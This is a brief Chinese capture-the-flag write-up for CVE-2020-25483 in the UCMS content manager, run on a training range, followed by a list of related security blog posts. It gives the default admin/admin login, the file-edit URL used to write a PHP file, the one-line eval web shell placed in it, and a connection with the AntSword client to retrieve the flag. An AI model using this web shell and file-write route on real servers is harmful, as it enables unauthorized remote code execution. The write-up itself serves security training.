春秋云境CVE-2020-25483

1.阅读靶场介绍

这里得到就是文件写入

然后再读取文件

2.启动靶场

如下图所示

这里我们可以直接再url后面加上

/ucms/login.php

进入下面所示的页面

这里输入账号/密码:admin/admin

下一步就是输入如下图的url

各位可以参考参考

https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.phpw

然后在下面输入这个木马

复制代码
<?php @eval($_POST['cmd']);?>

然后访问

这个url:https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/1.php

得到的是一片空白那就是对的

3.中国蚁剑启动

输入这些参数

然后就可以找到flag了

感谢各位的观看哟

相关推荐
admin and root13 小时前
「移动安全」安卓APP 反编译&frida脱壳技巧分享
android·开发语言·python·web安全·微信小程序·移动安全·攻防演练
云水一下14 小时前
零基础玩转bWAPP靶场(十四):SQL 注入(GET/选择型)
web安全·sql注入·bwapp
Demons_kirit14 小时前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd16 小时前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出17 小时前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的17 小时前
汇编——寻址方式
开发语言·汇编·网络安全
云水一下2 天前
零基础玩转bWAPP靶场(十三):SQL 注入(GET/搜索型)
web安全·sql注入·bwapp
云水一下2 天前
零基础玩转bWAPP靶场(十二):Mail Header Injection(SMTP邮件头注入)
web安全·bwapp·邮箱头注入
上海云盾-高防顾问2 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全
中北marry2 天前
玄机靶场wp 应急响应-webshell查杀
网络安全